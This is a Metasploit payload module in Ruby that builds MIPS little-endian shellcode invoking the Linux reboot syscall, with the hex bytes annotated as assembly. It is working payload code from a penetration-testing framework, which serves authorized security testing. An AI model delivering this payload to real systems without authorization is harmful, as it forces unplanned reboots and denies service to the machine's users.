1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 32
8

9
  include Msf::Payload::Single
10

11
  def initialize(info = {})
12
    super(
13
      merge_info(
14
        info,
15
        'Name' => 'Linux Reboot',
16
        'Description' => %q{
17
          A very small shellcode for rebooting the system using
18
          the reboot syscall. This payload is sometimes helpful
19
          for testing purposes. Requires CAP_SYS_BOOT privileges.
20
        },
21
        'Author' => [
22
          'Michael Messner <devnull[at]s3cur1ty.de>', # metasploit payload
23
          'rigan - <imrigan[at]gmail.com>' # original payload
24
        ],
25
        'References' => [
26
          ['URL', 'https://man7.org/linux/man-pages/man2/reboot.2.html'],
27
          ['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php']
28
        ],
29
        'License' => MSF_LICENSE,
30
        'Platform' => 'linux',
31
        'Arch' => ARCH_MIPSLE,
32
        'Payload' => {
33
          'Offsets' => {},
34
          'Payload' => ''
35
        }
36
      )
37
    )
38
  end
39

40
  def generate(_opts = {})
41
    shellcode =
42
      "\x21\x43\x06\x3c" +  # lui     a2,0x4321
43
      "\xdc\xfe\xc6\x34" +  # ori     a2,a2,0xfedc
44
      "\x12\x28\x05\x3c" +  # lui     a1,0x2812
45
      "\x69\x19\xa5\x34" +  # ori     a1,a1,0x1969
46
      "\xe1\xfe\x04\x3c" +  # lui     a0,0xfee1
47
      "\xad\xde\x84\x34" +  # ori     a0,a0,0xdead
48
      "\xf8\x0f\x02\x24" +  # li      v0,4088
49
      "\x0c\x01\x01\x01"    # syscall 0x40404
50

51
    return super + shellcode
52
  end
53
end
54

55